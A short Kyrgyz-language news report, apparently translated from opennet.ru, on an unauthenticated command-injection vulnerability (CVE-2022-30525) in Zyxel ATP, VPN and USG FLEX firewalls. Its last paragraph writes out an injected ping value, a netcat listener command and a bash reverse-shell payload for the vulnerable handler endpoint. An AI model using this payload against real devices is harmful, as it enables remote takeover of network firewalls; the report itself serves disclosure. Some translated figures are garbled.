Zyxel брандмауэриндеги аялуу, аныктыгын текшерүүсүз кодду аткарууга мүмкүндүк берет

Ишканаларда брандмауэрлердин, IDSтин жана VPNдин иштешин уюштуруу үчүн иштелип чыккан ATP, VPN жана USG FLEX сериясындагы Zyxel түзмөктөрүндө тышкы чабуулчуга кодду ишке ашырууга мүмкүндүк берген олуттуу аялуу (CVE-2022-30525) аныкталган. аутентификациясыз колдонуучунун укуктары жок түзмөк. Чабуул жасоо үчүн чабуулчу HTTP/HTTPS протоколун колдонуу менен түзмөккө суроо-талаптарды жөнөтө алышы керек. Zyxel ZLD 5.30 микропрограммасын жаңыртуудагы кемчиликти оңдоду. Shodan кызматынын маалыматы боюнча, учурда глобалдык тармакта HTTP/HTTPS аркылуу суроо-талаптарды кабыл алган 16213 XNUMX потенциалдуу аялуу түзмөк бар.

Операция /ztp/cgi-bin/handler веб-ишкерине атайын иштелип чыккан буйруктарды жөнөтүү аркылуу жүзөгө ашырылат, аутентификациясыз жеткиликтүү. Көйгөй lib_wan_settings.py китепканасында колдонулган жана setWanPortSt операциясын иштетүүдө аткарылган os.system чалуу аркылуу системада буйруктарды аткарууда суроо-талаптын параметрлерин туура тазалоонун жоктугунан келип чыгат.

Мисалы, чабуулчу сапты өткөрүшү мүмкүн “; ping 192.168.1.210;" бул системадагы "ping 192.168.1.210" буйругун аткарууга алып келет. Буйрук кабыгына кирүү үчүн, сиз тутумуңузда “nc -lvnp 1270” иштетип, андан кийин түзмөккө '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Source: opennet.ru

Комментарий кошуу